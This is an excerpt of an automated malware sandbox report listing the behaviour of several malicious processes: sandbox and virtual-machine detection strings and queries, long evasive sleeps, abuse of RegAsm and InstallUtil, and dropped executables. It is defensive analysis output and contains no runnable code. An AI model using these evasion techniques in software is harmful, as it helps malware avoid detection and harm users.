Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found stalling execution ending in API Sleep call

Source: C:\Users\user\Desktop\wfJfUGeGT3.exe

Stalling execution: Execution stalls by calling Sleep

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_DiskDrive

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Cerker.exe, 00000028.00000002.3457516161.0000000000B48000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL!
Source: Cerker.exe, 00000028.00000002.3447790560.00000000006EC000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: Cerker.exe, 0000001B.00000002.3273140765.000000000050E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL&
Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 0000002A.00000002.4703878971.0000000012DF1000.00000004.00000800.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 0000002A.00000000.3476472138.0000000000BF2000.00000002.00000001.01000000.00000014.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe.28.dr	Binary or memory string: SBIEDLL.DLLCYPRXF4YDFY6QMQHUAXZT5XLEAGZGVJ3A0GTSHCUZNG06Y5STECU0VFHSQJW8F9JVXKHIZOE3AKCLUOQWFHDGCKXZU8MLY2AIRDMC4ZKAOLOTU0OP35YNQFJXNACVRI1O5YC8G65GRE3VQLU3ILCNNCDKTAI1U61CGKVFHFGDS6ABUAJ4CPKYCVYNZFVRTG8CHS1VDCZCHBDLKTDPNQWQKMSFLTBTZNXIDYAJWWSIZWFBCL7VYZ2LPUJ3GCJHXOE42DJINC9H5K5AGSJQMP8HV7AX4J94NTHIOF0K5ACLEKPCPSFME7TKJRC45CKXXDHYXUEKBVGDJLHVKZY5XDQVJBCFQ9OOUCCEEILJSWQUHXZ8S2UYL5DT63P3LIW7SPVRA0ABTNT91H5XMQ1C7F8XHDDJNWN6EOHW3HG9SOGOGADEQA5U71OGSHQYSBBEV6LPZC3C0VGSTLA8FFNOWMZA72I0XSI7ALQJN2HFITO6ZQFFB87JJA3CETI1BTNOUIRFPUCCHJ2LGWTHJYAGJI7PFFCOSVPKFZOOFBBPNCE1LYP96B0AVSJD670IMO5OC4IRI8OAPZAAJH5KZXI4Q8EXPPSCHX0GTXXDRQ6PJXSK6NWIOUQLPSUWJX4CNVETJSLZNPUS1JKDWCYP93OZBIIMYY4PG58CDFARWFX1YWVGE1PJ8LZR9TMVNUVEGAACJJNTK9EXVQA7K4AU4N4RZIZRTGDKNT9XUK8PUI6GT1KPGERR9INFO
Source: Cerker.exe, 0000001B.00000002.3268115258.00000000001CD000.00000004.00000010.00020000.00000000.sdmp, Cerker.exe, 00000028.00000002.3447790560.00000000006EC000.00000004.00000010.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 0000002A.00000002.4674057559.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: Cerker.exe, 0000001B.00000002.3268115258.00000000001CD000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: QSBIEDLL.DLL
Source: kitty.exe, 00000018.00000002.3280507784.0000000000DE9000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: VSBIEDLL.DLL
Source: InstallUtil.exe, 00000032.00000002.3758938143.00000000033CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \QEMU-GA.EXE
Source: InstallUtil.exe, 00000032.00000002.3758938143.00000000033CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \QEMU-GA.EXE@\JQ
Source: InstallUtil.exe, 00000032.00000002.3758938143.00000000033CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \QEMU-GA.EXE`,JQ

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Memory allocated: F50000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Memory allocated: 1AB60000 memory reserve \| memory write watch
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Memory allocated: F60000 memory reserve \| memory write watch
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Memory allocated: 1B030000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Memory allocated: 220B75C0000 memory reserve \| memory write watch
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Memory allocated: 1240000 memory reserve \| memory write watch
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Memory allocated: 1ADE0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Memory allocated: 22C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Memory allocated: 2400000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Memory allocated: 4400000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 11D0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2DB0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 4DB0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Memory allocated: 2730000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Memory allocated: 27A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Memory allocated: 47A0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 16A0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 32D0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 52D0000 memory reserve \| memory write watch

Contains capabilities to detect virtual machines

Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc

Contains long sleeps (>= 3 min)

Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 600000
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 599876
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 599748
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 599593
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 599475
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 599359
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 599192
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 598829
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 598466
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 598275
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 598122
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 597959
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 597755
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 597609
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 597491
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 597372
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 597219
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 597090
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 596969
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 596831
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 596712
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 596566
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 596440
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 596323
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 596204
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 596070
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 595880
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 595695
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 595055
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 594851
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 594684
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 594568
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 594447
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 594326
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 594205
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 594044
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 593923
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 593802
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 593666
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 593555
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 593395
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 593270
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 593136
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 593024
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 592894
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 592725
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 592572
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 592428
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 591935
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 591600
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 591422
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 591314
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 591188
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 591072
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 590942
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 590798
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 590645
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 590517
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 590400
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 590274
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 590129
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 589991
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 589830
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 589589
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 589386
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 589203
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 589102
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 588969
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 588832
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 588576
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 588213
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 587769
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 587619
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 587501
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 587354
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 587144
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 586881
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 586638
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 586470
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 586314
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 586105
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 585905
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 585639
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 585310
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 584895
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 584640
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 584477
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 584286
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 584155
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Window / User API: threadDelayed 568
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Window / User API: threadDelayed 5552
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Window / User API: threadDelayed 4100
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Window / User API: threadDelayed 1634

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000221001\exbuild.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\exbuild[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000260001\Channel1.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Dropped PE file which has not been started: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\WIDeqOfZq9.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000223001\36f677264b.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Channel1[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\D0nMCdvUeB.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\BowExpert[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000255001\channel2.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Dropped PE file which has not been started: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\channel2[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000256001\BowExpert.exe	Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	API coverage: 4.7 %
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	API coverage: 7.3 %
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	API coverage: 4.8 %
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	API coverage: 3.7 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif TID: 7584	Thread sleep time: -900000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif TID: 7632	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif TID: 7584	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe TID: 7324	Thread sleep count: 568 > 30
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe TID: 7324	Thread sleep time: -5680000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe TID: 2284	Thread sleep time: -60000s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 5536	Thread sleep time: -90918s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -24903104499507879s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -600000s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -599876s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 1120	Thread sleep count: 5552 > 30
